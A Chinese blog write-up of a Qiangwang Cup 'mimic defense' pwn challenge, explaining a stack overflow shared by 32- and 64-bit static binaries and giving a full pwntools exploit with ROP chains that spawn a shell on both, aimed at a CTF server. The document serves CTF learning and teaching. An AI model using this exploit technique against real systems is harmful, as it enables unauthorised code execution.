强网杯-拟态

最新推荐文章于 2023-02-03 15:24:21 发布
最新推荐文章于 2023-02-03 15:24:21 发布
阅读量301 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stella_Leo/article/details/119897566
版权

做了一道拟态防御的题目。程序给了两个附件,一个32位一个64位。只有PIE保护没有开启。

32位

int vul()
{
  char v1; // [esp+Ch] [ebp-10Ch]

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  j_memset_ifunc((int)&v1, 0, 256);
  read(0, &v1, 768);
  return puts(&v1);
}

非常明显的一个溢出

64位

__int64 vul()
{
  __int64 v0; // rdx
  char buf; // [rsp+0h] [rbp-110h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  j_memset_ifunc(&buf, 0LL, 256LL);
  read(0, &buf, 0x300uLL);
  return puts(&buf, &buf, v0);
}

和32位的程序是一模一样的。

到这里我就懵了,不知道啥意思,于是我就去搜集了一些拟态防御的资料。

总结了一下就是,构建不同的架构组件,来实现相同的业务。当有黑客进行攻击的时候,这些相同的业务输出不同就能识别黑客攻击。

这里的话因该就是,靶机上运行了两个程序,32位和64位,当我们去发payload的时候,必须32位和64位同时打通,否则就会报错(应为打通一个的话,另外一个输出不同)
看一下,溢出长度是0x110没错,但是32位到ret_addr是0x114而64位是0x118,所以我们需要控制返回地址做一点改变,

32位返回地址在64位里面是fake_rbp,所以如果我们让32位的地方是add esp,4然后再写ROP那么就可以两个都打通了。

这个题提供了便利,因为都是静态编译,所以肯定有很多gadget,尝试去搜一下。

0x0804f095 : add esp, 0x1c ; ret
0x080a69f2 : add esp, 0x20 ; ret
0x0804991a : add esp, 0x2c ; ret
0x080a8f69 : add esp, 0xc ; ret



0x000000000044a699 : add rsp, 0x148 ; ret
0x0000000000414ef8 : add rsp, 0x18 ; ret
0x000000000043b749 : add rsp, 0x28 ; ret
0x0000000000461f85 : add rsp, 0x38 ; ret
0x000000000046d438 : add rsp, 0x48 ; ret
0x000000000043b979 : add rsp, 0x58 ; ret
0x000000000043b86b : add rsp, 0x68 ; ret
0x0000000000461d30 : add rsp, 0x78 ; ret
0x000000000040cd17 : add rsp, 0x80 ; ret
0x00000000004079d4 : add rsp, 0xd8 ; ret
0x0000000000400412 : add rsp, 8 ; ret

可以选择 add esp,0xcadd rsp,(32位ROP的长度+0x8)

然后我以为要去泄露libc啥的,但是我发现了ROPgadget的一个新东西,当我们gadget够多的时候,可以

ROPgadget --binary pwn --ropchain自动生成ROP链,直接getshell

来看看32位的

直呼nb,把哪些inc eax改一下。然后算一下长度。

100

然后发现找不到适合的gadget,于是我们随便选择了一个。

0xd8,写了如下payload

payload = 'a'.ljust(0x10c + 0x4,'\x00') + p32(add_esp_0ch_addr) + '\x00'*4
payload += p64(add_rsp_d8h_addr) + payload32.ljust(0xd8,'\x00') + payload64

0x10c+0x4是32位的ret,然后接上0x1c的无效字符(对32位来说),最后就是32位的payload,64位的返回地址刚好是0x110+0x8的地方。

exp

from pwn import *
from struct import *                                                
context(log_level = 'debug',os = 'linux',arch = 'i386')             
                                                                    
#sh = process("./pwn2")                                             
#sh = process("./pwn")                                              
sh = remote("node3.buuoj.cn","26678")                               
                                                                    
p = ''                                                              
                                                                    
p += pack('<I', 0x0806e9cb) # pop edx ; ret                         
p += pack('<I', 0x080d9060) # @ .data                               
p += pack('<I', 0x080a8af6) # pop eax ; ret                         
p += '/bin'                                                         
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret        
p += pack('<I', 0x0806e9cb) # pop edx ; ret                         
p += pack('<I', 0x080d9064) # @ .data + 4                           
p += pack('<I', 0x080a8af6) # pop eax ; ret                   
p += '//sh'       
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret                   
p += pack('<I', 0x080d9068) # @ .data + 8                     
p += pack('<I', 0x08056040) # xor eax, eax ; ret              
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x080481c9) # pop ebx ; ret                 
p += pack('<I', 0x080d9060) # @ .data                     
p += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret   
p += pack('<I', 0x080d9068) # @ .data + 8       
p += pack('<I', 0x080d9060) # padding without overwrite e
p += pack('<I', 0x0806e9cb) # pop edx ; ret          
p += pack('<I', 0x080d9068) # @ .data + 8                
p += pack('<I', 0x08056040) # xor eax, eax ;ret      
p += pack('<I', 0x080a8af6) # pop eax ; ret        
p += p32(0xb)
p += pack('<I', 0x080495a3) # int 0x80

payload32 = p
p = ''

p += pack('<Q', 0x0000000000405895) # pop rsi ; ret                 
p += pack('<Q', 0x00000000006a10e0) # @ .data                       
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret                 
p += '/bin//sh'                                                     
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret                 
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8                           
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret                    
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret        
p += pack('<Q', 0x00000000004005f6) # pop rdi ; ret                         
p += pack('<Q', 0x00000000006a10e0) # @ .data                               
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret                         
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8                           
p += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret                         
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8                           
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret                    
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += p64(0x3b)                                                              
p += pack('<Q', 0x00000000004011dc) # syscall                               
payload64 = p                                  
print len(payload64)                             
                                                                            
add_esp_0ch_addr =  0x080a8f69                                              
add_rsp_d8h_addr = 0x00000000004079d4                                       
                                                                            
payload = 'a'.ljust(0x10c + 0x4,'\x00') + p32(add_esp_0ch_addr) + '\x00'*4  
payload += p64(add_rsp_d8h_addr) + payload32.ljust(0xd8,'\x00') + payload64 
                                                                            
sh.sendlineafter("We give you a little challenge, try to pwn it?\n",payload)
                                                                            
sh.interactive()

如上,学到了ROPchain

16385
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
邬江兴院士-拟态防御Web服务器设计与实现
07-31
基于拟态防御模型构建了拟态防御 Web 服务器, 介绍了其架构,分析了拟态原理在 Web 服务器上的实现.安全性和性能测试结果显示,拟态防御 Web 服务器能够在 较小开销的前提下防御测试中的全部攻击类型.说明拟态防御 Web...
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
强网杯2019 拟态 STKOF
seaaseesa的博客
04-09 1044
强网杯2019 拟态 STKOF 给了我们两个二进制,分别为32位和64位,两个程序功能完全相同,有一个裁决程序,fork出这两个程序,并监听着它们的输出,如果两者输出不一样或者一方崩溃,则裁决程序就会kill掉它们两个。 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,32位 64位 可知32位溢出的距离为0x110,64位溢出的距离为0x118。由于程序没有...
强网杯 stkof 拟态防御&not_the_same_3dsctf_2016
weixin_44113469的博客
02-07 225
强网杯 stkof 拟态防御 之前强网杯的一道简单题,栈溢出,俩程序,静态编译 ropchain 一梭子getshell,因为是拟态防御,所以必须一个payload 同时打俩程序,熟悉rop链构造,就很愉快,否则就比较尴尬。 exp: from pwn import * #p=remote p=process("./pwn2")st p.recvuntil('try to pwn it?\n') rop32='' rop32+=struct.pack('<I', 0x0806e9cb) # por.
强网拟态REV-(fastjsoN)wp
Henlenl的博客
10-26 273
fastjsoN 依照这个链接可以知道 跟之前长安杯和看雪KCTF题目差不多 先用脚本恢复一下符号 0x02, 0x3A, 0x10, 0x6C, 0x6F, 0x6E, 0x67, 0x32, 0x73, 0x74, 0x72, 0x10, 0x73, 0x74, 0x72, 0x32, 0x6C, 0x6F, 0x6E, 0x67, 0x10, 0x73, 0x64, 0x66, 0x73, 0x66, 0x73, 0x64, 0x66, 0x0E, 0x73, 0x74, 0x72, 0x32,
第五届“强网”拟态防御国际精英挑战赛——预选赛入围战队篇
Cyberpeace的博客
12-02 1152
第五届“强网”拟态防御国际精英挑战赛战队集结完毕,期待各位顶峰相见!
第四届“强网”拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
大数据-算法-拟态弧菌OmpU抗原B细胞线性表位的筛选与鉴定.pdf
04-19
大数据-算法-拟态弧菌OmpU抗原B细胞线性表位的筛选与鉴定.pdf
安全技术-网络信息-拟态环境及其网络大众传播的建构与控制.pdf
04-28
安全技术-网络信息-拟态环境及其网络大众传播的建构与控制.pdf
2022强网拟态 (部分wp)
qq_62046696的博客
02-03 529
这道题也是看了很久,因为没环境,然后其他的wp写的比较简单,对于我这种菜鸡逃逸28位自己琢磨了好久,这种序列化逃逸的题,需要我们提前构造然后一步步写。
2022强网拟态pwn-bfbf
z1r0的博客
11-16 497
这题笔者感觉就是绕过这个read的限制,之前遇见过类似的,可以用close(0)然后read读flag的时候rdi可以置为0,就可以绕过line 0005的限制了,赛后看其他师傅的wp还看到了用sendfile的方法。控制好这里的数字然后泄露出libc,再打返回地址到rop链即可。漏洞点的话就是index这个下标没有限制从而导致的oob。
第四届强网拟态 EasyFilter
feng的博客
11-04 540
前言 当时比赛没报名,借了个号上去瞅了一眼题目,看到这个PHP代码审计比较亲切就做了这一题,当时也是通过报错大胆尝试成功试了出来解法。 赛后花爷拿着我的wp去了p神的知识星球问了一下原理,P神给了个解答,但是自己还没有看过PHP的C代码所以很难理解(实际上都一年没有碰过C语言了)。恰好打算把最近的事情忙完就去学学PHP的底层,过了这么些天,昨天弄好了vscode调试PHP的C代码的环境,今天仔细研究了一下终于有点懂了,而且第一次看PHP的底层C,感觉学到了好多的东西。 做题时候写的WP <?php
2021强网拟态复现
qq_46441427的博客
10-30 512
sonic checksec一下 发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了 程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell from pwn import * #r=remote('123.60.63.90',6890) r = process('./sonic') context(arch='amd64', os='linux')
2022强网拟态pwn-store
z1r0的博客
11-22 711
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
2022强网拟态pwn-webheap
z1r0的博客
11-21 926
index代表的是上图中的index,p8(0x82)代表后面要接一个p32的数据(这些都可以在上面的encoding_byte中找到是什么意思)p8(0xbd)代表的是字符串,接着后面会接content的长度和content,遵循上面的反序列化格式即可。上面给出10, “foo”,下面的compose的第一个就是0xb9,第二个是有几个参数,第三个是第一个参数的值,第四个是string类型,第五个是对应的foo的长度,第6个是foo这个字符串。所以笔者就配合前期逆向,顺着这上面的初步写了一个序列化实例。
第五届“强网”拟态防御国际精英挑战赛——线上预选赛火热开赛!
Cyberpeace的博客
11-04 432
截至2022年,第五届“强网”拟态防御国际精英挑战赛已累积接受全球万余支战队、数十万人次的参与!
重磅来袭 | 第五届“强网”拟态防御国际精英挑战赛创新升级,燃爆全球!
Cyberpeace的博客
10-09 423
此外,线上预选赛会面向全球战队开放报名,具体报名信息即将发布,敬请期待!此外,本届比赛特别设置“实网验证挑战赛”,通过邀请战队实际验证的方式,直观展示车联网设备,在增加比赛挑战性和趣味性的同时,进一步检验拟态设备相较于非拟态设备的技术优越性,通过现场的设备反馈,使拟态防御效果更加真实可感。本届比赛创新开辟四大赛道,在第四届大赛引入ADAS设备测试的基础上,进一步将赛道细化为“互联网赛道”“车联网赛道”“电信网赛道”“密码机赛道”四项,激励具有技术专长的人才在比赛中发挥所长进行比拼。
第四届“强网”拟态防御国际精英挑战赛_wp(上)
蚁景网安学院
10-28 706
Re1、fastjs提取字节码/* File generated automatically by the QuickJS compiler. */ #include "quickjs...
Android 实现新拟态效果
最新发布
05-17
拟态(Neumorphism)是一种流行的 UI 设计趋势,它采用了一种类似于凸起和凹陷的效果,使得 UI 元素看起来更加真实和生动。下面是一些实现新拟态效果的 Android 库和框架: 1. Neumorphism-Android:这是一个开源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值